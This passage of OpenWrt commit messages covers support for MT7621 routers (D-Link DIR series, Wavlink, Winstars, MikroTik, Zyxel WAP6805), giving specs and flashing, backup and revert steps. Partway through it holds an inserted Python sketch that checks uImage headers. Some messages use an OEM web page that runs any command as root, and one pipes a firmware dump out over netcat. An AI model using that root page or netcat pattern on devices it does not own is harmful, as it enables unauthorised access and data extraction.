* Switch: 1 WAN, 4 LAN (Gigabit)
* Ports: 1 USB 2.0, 1 USB 3.0
* Buttons: Reset, WPS
* LEDs: Power (blue/orange), Internet (blue/orange), WiFi 2.4G (blue),
WiFi 5G (blue), USB 3.0 (blue), USB 2.0 (blue)
Notes:
* WiFi 2.4G and WiFi 5G LEDs are wired directly to the wireless chips
Installation:
* D-Link Recovery GUI: power down the router, press and hold the reset
button, then re-plug it. Keep the reset button pressed until the power
LED starts flashing orange, manually assign a static IP address under
the 192.168.0.xxx subnet (e.g. 192.168.0.2) and go to http://192.168.0.1
* Some modern browsers may have problems flashing via the Recovery GUI,
if that occurs consider uploading the firmware through cURL:
curl -v -i -F "firmware=@file.bin" 192.168.0.1
MAC addresses:
lan factory 0xe000 *:a7 (label)
wan factory 0xe006 *:aa
2.4 factory 0xe000 +1 *:a8
5.0 factory 0xe000 +2 *:a9
Seems like vendor didn't replace the dummy entries in the calibration data.
Signed-off-by: James McGuire <jamesm51@gmail.com>
[fix device definition title]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
While we mostly use the ucidef_set_led_* functions directly in 01_leds
we still have the set_wifi_led function in parallel for several old
devices. This is not only inconsistent with the other definitions,
it also links to the wlan0 interface instead of using a phy trigger
which would be independent of the interface name (and is used for
all newer devices anyway). Apart from that, the standard names
"wifi" and "wifi-led" are not very helpful in a world with different
radio bands either.
Thus, this patch removes the set_wifi_led function and puts the
relevant commands into the cases explicitly. This makes the
mechanism used more evident and will hopefully lead to some future
improvements or at least prevent some copy-pasting of the old
setups.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
In ramips, it's not common to use an alias for specifying the WiFi
LED; actually only one device uses this mechanism (TL-WR841N v14).
Particularly since the WiFi LEDs are typically distinguished between
2.4G and 5G etc. it is also not very useful for this target.
Thus, this patch removes the setup lines for this mechanism and
converts the TL-WR841N v14 to the normal setup.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Like in the previous patch for ath79 target, this will remove the
"devicename" from LED labels in ramips as well.
The devicename is removed in DTS files and 01_leds, consolidation
of definitions into DTSI files is done where (easily) possible,
and migration scripts are updated.
For the latter, all existing definitions were actually just
devicename migrations anyway. Therefore, those are removed and
a common migration file is created in target base-files. This is
actually another example of how the devicename removal makes things
easier.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This submission relied heavily on the work of
Santiago Rodriguez-Papa <contact at rodsan.dev>
Specifications:
* SoC: MediaTek MT7621A (880 MHz 2c/4t)
* RAM: Winbond W632GG6MB-12 (256M DDR3-1600)
* Flash: Winbond W29N01HVSINA (128M NAND)
* Eth: MediaTek MT7621A (10/100/1000 Mbps x5)
* Radio: MT7603E/MT7615N (2.4 GHz & 5 GHz)
4 antennae: 1 internal and 3 non-detachable
* USB: 3.0 (x1)
* LEDs:
White (x1 logo)
Green (x6 eth + wps)
Orange (x5, hardware-bound)
* Buttons:
Reset (x1)
WPS (x1)
Installation:
Flash factory image through GUI.
This might fail due to the A/B nature of this device. When flashing, OEM
firmware writes over the non-booted partition. If booted from 'A',
flashing over 'B' won't work. To get around this, you should flash the
OEM image over itself. This will then boot the router from 'B' and
allow you to flash OpenWRT without problems.
Reverting to factory firmware:
Hard-reset the router three times to force it to boot from 'B.' This is
where the stock firmware resides. To remove any traces of OpenWRT from
your router simply flash the OEM image at this point.
Signed-off-by: J. Scott Heppler <shep971@centurylink.net>
The uci-default mechanism to update the compat-version was only
meant for early DSA-adopters, which should have updated by now.
Remove this workaround again in order to prevent the intended
experiences for all the other people.
This reverts:
a9703db72030 ("mvebu: fix sysupgrade experience for early DSA-adopters")
86c89bf5e8f5 ("kirkwood: fix sysupgrade experience for early DSA-adopters")
Partially reverted:
1eac573b5304 ("ramips: mt7621: implement compatibility version for DSA migration")
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This patch adds support for D-Link DIR-2660 A1.
Specifications:
* Board: AP-MTKH7-0002
* SoC: MediaTek MT7621AT
* RAM: 256 MB (DDR3)
* Flash: 128 MB (NAND)
* WiFi: MediaTek MT7615N (x2)
* Switch: 1 WAN, 4 LAN (Gigabit)
* Ports: 1 USB 2.0, 1 USB 3.0
* Buttons: Reset, WPS
* LEDs: Power (white/orange), Internet (white/orange), WiFi 2.4G (white),
WiFi 5G (white), USB 3.0 (white), USB 2.0 (white)
Notes:
* WiFi 2.4G and WiFi 5G LEDs are wired directly to the wireless chips
Installation:
* D-Link Recovery GUI: power down the router, press and hold the reset
button, then re-plug it. Keep the reset button pressed until the power
LED starts flashing orange, manually assign a static IP address under
the 192.168.0.xxx subnet (e.g. 192.168.0.2) and go to http://192.168.0.1
* Some modern browsers may have problems flashing via the Recovery GUI,
if that occurs consider uploading the firmware through cURL:
curl -v -i -F "firmware=@file.bin" 192.168.0.1
MAC addresses:
lan factory 0xe000 *:a7 (label)
wan factory 0xe006 *:aa
2.4 factory 0xe000 +1 *:a8
5.0 factory 0xe000 +2 *:a9
Seems like vendor didn't replace the dummy entries in the calibration data.
Signed-off-by: Josh Bendavid <joshbendavid@gmail.com>
[rebase onto already merged DIR-1960 A1, add MAC addresses to commit message]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This patch adds support for Wavlink WL-WN531A6 (Quantum D6).
Specifications:
--------------
* SoC: Mediatek MT7621AT 2C2T, 880MHz
* RAM: 128MB DDR3, Nanya NT5CB64M16GP-EK
* Flash: 16MB SPI NOR flash, GigaDevice GD25Q127CSIG
* WiFi 5GHz: Mediatek MT7615N (4x4:4) on mini PCIE slot.
* WiFi 2.4GHz: Mediatek MT7603EN (2x2:2) on mini PCIE slot.
* Ethernet: MT7630, 5x 1000Base-T
* LED: Power, WAN, LAN(x4), WiFi, WPS, dual color
"WAVLINK" LED logo on the top cover.
* Buttons: Reset, WPS, "Turbo", touch button on the top
cover via RH6015C touch sensor.
* UART: UART1: serial console (57600 8n1) on the J4 header
located below the top heatsink.
UART2: J12 header, located on the right side of
the board.
* USB: One USB3 port.
* I2C: J9 header, located below the top heatsink.
Backup the OEM Firmware:
-----------------------
There isn't any firmware released for the WL-WN531A6 on
the Wavlink web site. Reverting back to the OEM firmware is
not possible unless we have a backup of the original OEM
firmware.
The OEM firmware is stored on /dev/mtd4 ("Kernel").
1) Plug a FAT32 formatted USB flash drive into the USB port.
2) Navigate to "Setup->USB Storage". Under the "Available
Network folder" you can see part of the mount point of
the newly mounted flash drive filesystem - e.g "sda1".
The full mount point is prefixed with "/media", so in
this case the mount point becomes "/media/sda1".
3) Go to http://192.168.10.1/webcmd.shtml .
4) Type the following line in the "Command" input box:
dd if=/dev/mtd4ro of=/media/sda1/firmware.bin
5) Click "Apply"
6) After a few seconds, in the text area should appear this
output:
30080+0 records in
30080+0 records out
7) Type "sync" in the "Command" input box and click "Apply".
8) At this point the OEM firmware is stored on the flash
drive as "firmware.bin". The size of the file is 15040 KB.
Installation:
------------
* Flashing instructions (OEM web interface):
The OEM web interface accepts only files with names containing
"WN531A6". It's also impossible to flash the *-sysupgrade.bin
image, so we have to flash the *-initramfs-kernel.bin first and
use the OpenWrt's upgrade interface to write the sysupgrade
image.
1) Rename openwrt-ramips-mt7621-wavlink_wl-wn531a6-initramfs-kernel.bin
to WN531A6.bin.
2) Connect your computer to one of the LAN ports of the
router with an Ethernet cable and open http://192.168.10.1
3) Browse to Setup -> Firmware Upgrade interface.
4) Upload the (renamed) OpenWrt image - WN531A6.bin.
5) Proceed with the firmware installation and give the device
a few minutes to finish and reboot.
6) After reboot wait for the "WAVLINK" logo on the top cover
to turn solid blue, and open http://192.168.1.1
7) Use the OpenWrt's "Flash Firmware" interface to write the
OpenWrt sysupgrade image:
openwrt-ramips-mt7621-wavlink_wl-wn531a6-squashfs-sysupgrade.bin
* Flashing instructions (u-boot TFTP):
1) Configure a TFTP server on your computer and set its IP
to 192.168.10.100
2) Rename the OpenWrt sysupgrade image to firmware.bin and
place it in the root folder of the TFTP server.
3) Power off the device and connect an Ethernet cable from
one of its LAN ports to your computer.
4) Press the "Reset" button (and keep it pressed)
5) Power on the device.
6) After a few seconds, when the connected port LAN LED stops
blinking fast, release the "Reset" button.
7) Flashing OpenWrt takes less than a minute, system will
reboot automatically.
8) After reboot the WAVLINK logo on the top cover will indicate
the current OpenWrt running status (wait until the logo turns
solid blue).
Revert to the OEM Firmware:
--------------------------
* U-boot TFTP:
Follow "Flashing instructions (u-boot TFTP)" and use the
"firmware.bin" backup image.
* OpenWrt "Flash Firmware" interface:
Upload the "firmware.bin" backup image and select "Force update"
before continuing.
Notes:
-----
* The MAC address shown on the label at the back of the device
is assigned to the 2.4G WiFi adapter.
MAC addresses assigned by the OEM firmware:
2.4G: *:XX (label): factory@0x0004
5G: *:XX + 1 : factory@0x8004
WAN: *:XX - 1 : factory@0xe006
LAN: *:XX - 2 : factory@0xe000
* The I2C bus and UART2 are fully functional. The headers are
not populated.
Signed-off-by: Georgi Vlaev <georgi.vlaev@konsulko.com>
The leds block was copied over from the RT-AC85P DTS to the common
DTSI while keeping the device-specific model name in the label.
This moves the LEDs back to the DTS files and adjusts the names to
properly resemble the model name of the devices used at, just like
it is handled on most other devices.
Fixes: 7c5f712e4fec ("ramips: add support for Asus RT-AC65P")
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This patch adds support for the MikroTik RouterBOARD 760iGS router.
It is similar to the already supported RouterBOARD 750Gr3.
The 760iGS device features an added SFP cage, and passive
PoE out on port 5 compared to the RB750Gr3.
https://mikrotik.com/product/hex_s
Specifications:
- SoC: MediaTek MT7621A
- CPU: 880MHz
- Flash: 16 MB
- RAM: 256 MB
- Ethernet: 5x 10/100/1000 Mbps
- SFP cage
- USB port
- microSD slot
Unsupported:
- Beeper (requires PWM driver)
- ZT2046Q (ADS7846 compatible) on SPI as slave 1 (CS1)
The linux driver requires an interrupt, and pendown GPIO
These are unknown, and not needed with the touchscreen
only used for temperature and voltage monitoring.
ads7846 hwmon:
temp0 is degrees Celsius
temp1 is voltage * 32
GPIOs:
- 07: input passive PoE out (lan5) compatible (Mikrotik) device connected
- 17: output passive PoE out (lan5) switch
Installation through RouterBoot follows the usual MikroTik method
https://openwrt.org/toh/mikrotik/common
To boot to initramfs image in RAM:
1. Setup TFTP server to serve initramfs image.
2. Plug Ethernet cable into WAN port.
3. Unplug power, hold reset button and plug power in.
Wait (~25 seconds) for beep and then release reset button.
The SFP LED will be lit in RouterBoot, but will not be lit in OpenWRT.
4. Wait for a minute. Router should be running OpenWrt,
check by plugging in to port 2-5 and going to 192.168.1.1.
To install OpenWrt to flash:
1. Follow steps above to boot initramfs image in RAM.
2. Flash the sysupgrade.bin image with web interface or sysupgrade.
3. Once the router reboots you will be running OpenWrt from flash.
OEM firmware differences:
- RouterOS assigns a different MAC address for each port
- The first address (E01 on the sticker) is used for wan (ether1 in OEM).
- The next address is used for lan2.
- The last address (E06 on the sticker) is used for sfp.
[Initial port work, shared dtsi]
Signed-off-by: Vince Grassia <vincenzo.grassia@zionark.com>
[SFP support and GPIO identification]
Signed-off-by: Luka Logar <luka.logar@iname.com>
[Misc. fixes and submission]
Signed-off-by: John Thomson <git@johnthomson.fastmail.com.au>
[rebase, drop uart3 from state_default on 750gr3, minor commit
title/message facelift]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This implements the newly introduced compat-version to prevent
broken upgrade between swconfig and DSA for ramips' mt7621 subtarget.
In order to make the situation more transparent for the user, and
to prevent large switch-cases for devices, it is more convenient to
have the entire subtarget 1.1-by-default. This means that new devices
will be added with 1.1 from the start, but in contrast we don't need
to switch them in board.d files. Apart from that, users that manually
backport devices to 19.07 with swconfig will have an equivalent
upgrade experience to officially supported devices.
Since DSA support on mt7621 is out for a while already, this applies
the same uci-defaults workaround for early adopters as already
done for kirkwood and mvebu in previous commits.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This patch adds support for D-Link DIR-1960 A1. Given the similarity with
the DIR-1760/2660 A1, this patch also introduces a common DTSI which can
be shared with these devices, with support to be added in future commits.
Specifications:
* Board: AP-MTKH7-0002
* SoC: MediaTek MT7621AT
* RAM: 256 MB (DDR3)
* Flash: 128 MB (NAND)
* WiFi: MediaTek MT7615N (x2)
* Switch: 1 WAN, 4 LAN (Gigabit)
* Ports: 1 USB 3.0
* Buttons: Reset, WPS
* LEDs: Power (white/orange), Internet (white/orange), WiFi 2.4G (white),
WiFi 5G (white), USB 3.0 (white)
Notes:
* WiFi 2.4G and WiFi 5G LEDs are wired directly to the wireless chips
Installation:
* D-Link Recovery GUI: power down the router, press and hold the reset
button, then re-plug it. Keep the reset button pressed until the power
LED starts flashing orange, manually assign a static IP address under
the 192.168.0.xxx subnet (e.g. 192.168.0.2) and go to http://192.168.0.1
* Some modern browsers may have problems flashing via the Recovery GUI,
if that occurs consider uploading the firmware through cURL:
curl -v -i -F "firmware=@file.bin" 192.168.0.1
MAC addresses:
lan factory 0xe000 *:EB (label)
wan factory 0xe006 *:EE
2.4 factory 0xe000 +1 *:EC
5.0 factory 0xe000 +2 *:ED
Seems like vendor didn't replace the dummy entries in the calibration data.
Signed-off-by: Josh Bendavid <joshbendavid@gmail.com>
[fix whitespace issues, create patch to merge DIR-1960 first, move
special WiFi MAC settings to DTS, extend commit message]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This 750gr3 GPIO17 switch was added based on vendor source,
but only the 760iGS (which shares the rbsysfs board identifier)
device has the physical wiring. The 750Gr3 actually does not
support PoE out.
Apart from that, note that the gpio base (480) would have required
this GPIO to be referenced as 497 if it was kept.
Fixes: 6ba58b7b020c ("ramips: cleanup the RB750Gr3 support")
Signed-off-by: John Thomson <git@johnthomson.fastmail.com.au>
[commit title/message facelift]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The Winstars WS-WN583A6 is a wireless repeater with 2 gigabit ethernet
ports. Even if mine is branded as "Gemeita AC2100", the sticker on the
back says WS-WN583A6. So I will refer to it as Winstars WS-WN583A6.
Probably the real product name is the Wavlink WL-WN583A6 because of
the many references to Wavlink in the OEM firmware and bootlog.
Hardware
--------
SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads)
RAM: 128MB
FLASH: 8MB NOR (GigaDevice GD25Q64B)
ETH: 2x 10/100/1000 Mbps Ethernet (MT7530)
WIFI:
- 2.4GHz: 1x MT7603E (2x2:2)
- 5GHz: 1x MT7615E (4x4:4)
- 6 internal antennas
BTN:
- 1x Reset button
- 1x WPS button
- 1x ON/OFF switch (working but unmodifiable)
- 1x Auto/Schedule switch (working but unmodifiable. Read Note #3)
LEDS:
- 1x White led
- 1x Red led
- 1x Amber led
- 1x Blue led
- 2x Blue leds (lan and wan port status: working but unmodifiable)
UART:
- 57600-8-N-1
Everything works correctly.
Currently there is no firmware update available. Because of this, in
order to restore the OEM firmware, you must firstly dump the OEM
firmware from your router before you flash the OpenWrt image.
Backup the OEM Firmware
-----------------------
The following steps are intended for users having little to no
experience in Linux. Obviously there are many ways to backup the OEM
firmware, but probably this is the easiest way for this router.
Procedure tested on M83A6.V5030.191210 firmware version.
1) Go to http://192.168.10.1/webcmd.shtml
2) Type the following line in the "Command" input box:
mkdir /etc_ro/lighttpd/www/dev; for i in /dev/mtd*ro; do dd if=${i} of=/etc_ro/lighttpd/www${i}; done
3) Click "Apply"
4) After a few seconds, in the textarea should appear this output:
16384+0 records in
16384+0 records out
8388608 bytes (8.0MB) copied, 4.038820 seconds, 2.0MB/s
384+0 records in
384+0 records out
196608 bytes (192.0KB) copied, 0.095180 seconds, 2.0MB/s
128+0 records in
128+0 records out
65536 bytes (64.0KB) copied, 0.032020 seconds, 2.0MB/s
128+0 records in
128+0 records out
65536 bytes (64.0KB) copied, 0.031760 seconds, 2.0MB/s
15744+0 records in
15744+0 records out
8060928 bytes (7.7MB) copied, 3.885280 seconds, 2.0MB/s
dd: can't open '/dev/mtd5ro': No such device
dd: can't open '/dev/mtd6ro': No such device
dd: can't open '/dev/mtd7ro': No such device
Excluding the "X.XXXXXX seconds" part, you should get the same
exact output. If your output doesn't match mine, stop reading
and ask for help in the forum.
5) Open the following links to download the partitions of the OEM FW:
http://192.168.10.1/dev/mtd0ro
http://192.168.10.1/dev/mtd1ro
http://192.168.10.1/dev/mtd2ro
http://192.168.10.1/dev/mtd3ro
http://192.168.10.1/dev/mtd4ro
If one (or more) of these files weighs 0 bytes, stop reading and ask
for help in the forum.
6) Store these downloaded files in a safe place.
7) Reboot your router to remove any temporary file from your router.
Installation
------------
Flash the initramfs image in the OEM firmware interface.
When openwrt boots, flash the sysupgrade image otherwise you won't be
able to keep configuration between reboots.
Restore OEM Firmware
--------------------
Flash the "mtd4ro" file you previously backed-up directly from LUCI.
Warning: Remember to not keep settings!
Warning2: Remember to force the flash.
Notes
-----
1) The "System Command" page allows to run every command as root.
For example you can use "dd" and "nc" to backup the OEM firmware.
PC (SERVER):
nc -l 5555 > ./mtdXro
ROUTER (CLIENT):
dd if=/dev/mtdXro | nc PC_IP_ADDRESS 5555
2) The OEM web interface accepts only images containing the string
"WN583A6" in the filename.
Currently the OEM interface accepts only the initramfs image
probably because it checks if the ih_size in the image header is
equal to the whole image size (instead of the kernel size)
Read more here:
https://forum.openwrt.org/t/support-for-strong-1200/22768/19
3) The white led (namely "Smart Night Light") can be controlled by the
user only if the side switch is set to "Schedule" otherwise it will
be activated by the light condition (there is a photodiode on the
top side of the router)
4) Router mac addresses:
LAN XX:XX:XX:XX:XX:8F
WAN XX:XX:XX:XX:XX:90
WIFI 2G XX:XX:XX:XX:XX:91
WIFI 5G XX:XX:XX:XX:XX:92
LABEL XX:XX:XX:XX:XX:91
Signed-off-by: Davide Fioravanti <pantanastyle@gmail.com>
[remove chosen node, fix whitespace]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
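Note 2 of the WS-WN583A6 commit message above guesses that the OEM upload page compares ih_size in the image header with the size of the whole image. The sketch below is an added example, not code from the commit or from the vendor: it parses the legacy U-Boot image header, checks both CRCs, and models that guess. The function names, the constructed sample images and the exact form of the OEM check (ih_size plus the 64-byte header equals the file size) are assumptions.

```python
import struct
import zlib

# Legacy U-Boot image header: 64 bytes, all integers big-endian.
# ih_magic, ih_hcrc, ih_time, ih_size, ih_load, ih_ep, ih_dcrc,
# ih_os, ih_arch, ih_type, ih_comp, ih_name[32]
UIMAGE_HDR = struct.Struct(">7I4B32s")
UIMAGE_MAGIC = 0x27051956


def crc32(data):
    return zlib.crc32(data) & 0xFFFFFFFF


def build_uimage(payload, name=b"constructed kernel"):
    """Wrap payload in a legacy uImage header (used only for the sample data)."""
    # ih_os=5 (Linux), ih_arch=5 (MIPS), ih_type=2 (kernel), ih_comp=3 (LZMA)
    fields = [UIMAGE_MAGIC, 0, 0, len(payload), 0x80001000, 0x80001000,
              crc32(payload), 5, 5, 2, 3, name]
    # The header CRC is computed over the header with ih_hcrc set to zero.
    fields[1] = crc32(UIMAGE_HDR.pack(*fields))
    return UIMAGE_HDR.pack(*fields) + payload


def inspect_uimage(image):
    """Parse the header and verify both CRCs; raise ValueError if not a uImage."""
    if len(image) < UIMAGE_HDR.size:
        raise ValueError("shorter than a uImage header")
    (magic, hcrc, _time, size, _load, _ep, dcrc,
     _os, _arch, _type, _comp, name) = UIMAGE_HDR.unpack_from(image)
    if magic != UIMAGE_MAGIC:
        raise ValueError("bad magic, not a legacy uImage")
    zeroed = image[:4] + b"\0\0\0\0" + image[8:UIMAGE_HDR.size]
    data = image[UIMAGE_HDR.size:UIMAGE_HDR.size + size]
    return {
        "name": name.rstrip(b"\0").decode("ascii", "replace"),
        "ih_size": size,
        "header_crc_ok": crc32(zeroed) == hcrc,
        # A truncated file yields fewer than ih_size bytes and fails here.
        "data_crc_ok": len(data) == size and crc32(data) == dcrc,
        # Bytes after the payload that ih_size covers (the rootfs in a
        # sysupgrade image); negative if the file is truncated.
        "trailing_bytes": len(image) - UIMAGE_HDR.size - size,
    }


def oem_would_accept(filename, image, name_token="WN583A6"):
    """Model of the OEM upload check as guessed in note 2 (an assumption)."""
    try:
        info = inspect_uimage(image)
    except ValueError:
        return False
    return (name_token in filename
            and info["header_crc_ok"]
            and info["trailing_bytes"] == 0)


# Constructed sample data: a fake kernel and a fake squashfs-like rootfs.
KERNEL = bytes(range(256)) * 16
ROOTFS = b"hsqs" + bytes(1024)
# initramfs-kernel image: the header covers everything that follows it.
INITRAMFS_IMG = build_uimage(KERNEL)
# sysupgrade image: header covers the kernel only, the rootfs is appended.
SYSUPGRADE_IMG = build_uimage(KERNEL) + ROOTFS

if __name__ == "__main__":
    for label, img in (("initramfs", INITRAMFS_IMG),
                       ("sysupgrade", SYSUPGRADE_IMG)):
        print(label, inspect_uimage(img),
              "accepted:", oem_would_accept("WN583A6.bin", img))
```

The same inspect_uimage() call can be run on an image file before flashing to catch a truncated or corrupted download.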
The function name ucidef_set_interface_lan_wan does not exist,
use the proper name by adding an "s" and thereby fix network
setup on these devices.
Fixes: 22468cc40c8b (ramips: erx and erx-sfp: fix missing WAN interface)
Signed-off-by: Nelson Cai <niphor@gmail.com>
[commit message/title facelift]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This patch adds support for D-Link DIR-867 A1 and D-Link DIR-882 A1. Given
the similarity of these devices, this patch also introduces a common DTS
shared between DIR-867 A1, DIR-878 A1 and DIR-882 A1.
Specifications:
* Board: AP-MTKH7-0002
* SoC: MediaTek MT7621AT
* RAM: 128 MB (DDR3)
* Flash: 16 MB (SPI NOR)
* WiFi: MediaTek MT7615N (x2)
* Switch: 1 WAN, 4 LAN (Gigabit)
* Ports: 1 USB 2.0, 1 USB 3.0
* Buttons: Reset, WiFi Toggle, WPS
* LEDs: Power (green/orange), Internet (green/orange), WiFi 2.4G (green),
WiFi 5G (green), USB 2.0 (green), USB 3.0 (green)
Notes:
* WiFi 2.4G and WiFi 5G LEDs are wired directly to the wireless chips
* DIR-867 wireless chips are limited to 3x3 streams at hardware level
* USB ports and related LEDs available only on DIR-882
Serial port:
* Parameters: 57600, 8N1
* Location: J1 header (close to the Reset, WiFi and WPS buttons)
* Pinout: 1 - VCC
2 - RXD
3 - TXD
4 - GND
Installation:
* D-Link Recovery GUI: power down the router, press and hold the reset
button, then re-plug it. Keep the reset button pressed until the power
LED starts flashing orange, manually assign a static IP address under
the 192.168.0.xxx subnet (e.g. 192.168.0.2) and go to http://192.168.0.1
* Some modern browsers may have problems flashing via the Recovery GUI,
if that occurs consider uploading the firmware through cURL:
curl -v -i -F "firmware=@file.bin" 192.168.0.1
Signed-off-by: Mateus B. Cassiano <mbc07@live.com>
[move DEVICE_VARIANT to individual definitions]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Specifications:
* SoC: MediaTek MT7621A (880 MHz 2c/4t)
* RAM: Nanya NT5CC128M16IP-DIT (256M DDR3-1600)
* Flash: Macronix MX30LF1G18AC-TI (128M NAND)
* Eth: MediaTek MT7621A (10/100/1000 Mbps x5)
* Radio: MT7615N (2.4 GHz & 5 GHz)
4 antennae: 1 internal and 3 non-detachable
* USB: 3.0 (x1)
* LEDs:
White (x1 logo)
Green (x6 eth + wps)
Orange (x5, hardware-bound)
* Buttons:
Reset (x1)
WPS (x1)
Everything works! Been running it for a couple weeks now and haven't had
any problems. Please let me know if you run into any.
Installation:
Flash factory image through GUI.
This might fail due to the A/B nature of this device. When flashing, OEM
firmware writes over the non-booted partition. If booted from 'A',
flashing over 'B' won't work. To get around this, you should flash the
OEM image over itself. This will then boot the router from 'B' and
allow you to flash OpenWRT without problems.
Reverting to factory firmware:
Hard-reset the router three times to force it to boot from 'B.' This is
where the stock firmware resides. To remove any traces of OpenWRT from
your router simply flash the OEM image at this point.
Signed-off-by: Santiago Rodriguez-Papa <contact@rodsan.dev>
[use v1 only, minor DTS adjustments, use LINKSYS_HWNAME and add it to
DEVICE_VARS, wrap DEVICE_PACKAGES, adjust commit message/title]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Specifications:
SoC: MT7621AT
RAM: 128MB
Flash: 16MB NOR SPI flash
WiFi: MT7615N (2.4GHz) and MT7615N (5Ghz)
LAN: 5x1000M
Firmware layout is Uboot with extra 96 bytes in header
Base PCB is AP-MTKH7-0002
LEDs Power Green,Power Orange,Internet Green,Internet Orange
LEDs "2.4G" Green & "5G" Green connected directly to wifi module
Buttons Reset,WPS,WIFI
Flashing instructions:
Upload image via emergency recovery mode
Push and hold reset button (on the back of the device) until power led
starts flashing (about 10 secs or so) while powering the device on.
Give it ~30 seconds, to boot the recovery mode GUI
Connect your client computer to LAN1 of the device
Set your client IP address manually to 192.168.0.2 / 255.255.255.0.
Call the recovery page for the device at http://192.168.0.1
Use the provided emergency web GUI to upload and flash a new firmware to
the device. Some browsers/OS combinations are known not to work, so if
you don't see the percentage complete displayed and moving within a few
seconds, restart the procedure from scratch and try another one,
or try the command line way.
Alternative method using command line on Linux:
curl -v -i -F "firmware=@openwrt-xxxx-squashfs-factory.bin" 192.168.0.1
Signed-off-by: Mathieu Martin-Borret <mathieu.mb@protonmail.com>
[use of generic uimage-padhdr in image generation code]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
The current one only looks for mt76x2e and mt7603e, and
does not work for 2 or more same Wi-Fi chips.
Refactor the script to cover those cases.
Signed-off-by: DENG Qingfang <dengqf6@mail2.sysu.edu.cn>
Hardware
--------
SoC: MediaTek MT7621ST
WiFi: MediaTek MT7603
Quantenna QT3840BC
Flash: 128M NAND
RAM: 64M
LED: Dual colour red and green
BTN: Reset
WPS
Eth: 4 x 10/100/1000 connected to MT7621 internal switch
MT7621 RGMII port connected to Quantenna module
GPIO: Power/reset of Quantenna module
Quantenna module
----------------
The Quantenna QT3840BC (or QV840) is a separate SoC running
another Linux installation. It is mounted on a wide mini-PCIe
form factor module, but is connected to the RGMII port of
the MT7621. It loads both a second uboot stage and an os
image from the MT7621 using tftp. The module is configured
using Quantenna specific RPC calls over IP, using 802.1q
over the RGMII link to support multiple SSIDs.
There is no support for using this module as a WiFi device
in OpenWrt. A package with basic firmware and management
tools is being prepared.
Serial ports
------------
Two serial ports with headers:
RRJ1 - 115200 8N1 - Connected to the Quantenna console
J1 - 57600 8N1 - Connected to the MT7621 console
Both share pinout with many other Zyxel/Mitrastar devices:
1 - NC (VDD)
2 - TX
3 - RX
4 - NC (no pin)
5 - GND
Dual system partitions
----------------------
The vendor firmware and boot loader use a dual partition
scheme storing a counter in the header of each partition. The
partition with the highest number will be selected for boot.
OpenWrt does not support this scheme and will always use the
first OS partition. It will reset both counters to zero the
first time sysupgrade is run, making sure the first partition
is selected by the boot loader.
Installation from vendor firmware
---------------------------------
1. Run a DHCP server. The WAP6805 is configured as a client device
and does not have a default static IP address. Make a note of
which address it is assigned
2. tftp the OpenWrt initramfs-kernel.bin image to this address.
Wait for the WAP6805 to reboot.
3. ssh to the OpenWrt initramfs system on 192.168.1.1. Make a
backup of all mtd partitions now. The last used OEM image is
still present in either "Kernel" or "Kernel2" at this point,
and can be restored later if you save a copy.
4. sysupgrade to the OpenWrt sysupgrade.bin image.
Installation from U-Boot
------------------------
This requires serial console access
1. Copy the OpenWrt initramfs-kernel.bin image as "ras.bin" to
your tftp server directory. Configure the server address as
192.168.0.33/24
2. Hit ESC when the message "Hit ESC key to stop autoboot"
appears
3. Type "ATGU" + Enter, and then "2" immediately after pressing enter.
4. Answer Y to the question "Erase Linux in Flash then burn new
one. Are you sure?", and answer the address/filename questions.
Defaults:
Input device IP (192.168.0.2)
Input server IP (192.168.0.33)
Input Linux Kernel filename ("ras.bin")
5. Wait until after you see the message "Done!" and power cycle
the device. It will hang after flashing.
6. Continue with step 3 and 4 from the vendor firmware procedure.
Notes on the WAP6805 U-Boot
---------------------------
The bootloader has been modified with both ZyXEL's zyloader and the
device specific dual partition scheme. These changes appear to have
broken a few things. The zyloader shell claims to support a number
of ZyXEL AT commands, but not all of them work. The image selection
scheme is unreliable and inconsistent. A limited U-Boot menu is
available - and used by the above U-Boot install procedure. But
direct booting into an uploaded image does not work, neither with
ram nor with flash. Flashing works, but requires a hard reset after
it is finished.
Reverting to OEM firmware
-------------------------
The OEM firmware can be restored by using mtd write from OpenWrt,
flashing it to the "Kernel" partition. E.g.
ssh root@192.168.1.1 "mtd -r -e Kernel write - Kernel" < oem.bin
OEM firmwares for the WAP6805 are not available for public download,
so a backup of the original installation is required. See above.
Alternatively, firmware for the WAP6806 (Armor X1) may be used. This
is exactly the same hardware. But the branding features do obviously
differ.
LED controller
--------------
Hardware implementation is unknown. The dual-color LED is controlled
by 3 GPIOs:
4: red
7: blinking green
13: green
Enabling both red and green makes the LED appear yellow.
The boot loader enables hardware blinking, causing the green LED to blink
slowly on power-on, until the OpenWrt boot mode starts a faster software
blink.
Signed-off-by: Bjørn Mork <bjorn@mork.no>
[fix alphabetic sorting for image build statement]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
The Xiaomi Mi Router AC2100 is a *black* cylindrical router that shares many
characteristics (apart from its looks and the GPIO ports) with the 6-antenna
*white* "Xiaomi Redmi Router AC2100"
See the visual comparison of the two routers here:
https://github.com/emirefek/openwrt-R2100/raw/imgcdn/rm2100-r2100.jpg
Specification of R2100:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN in Yellow and Blue
- UART: On board (Don't know where; should be confirmed by somebody else)
- Modified u-boot
Hacking of official firmware process is same at both RM2100 and R2100.
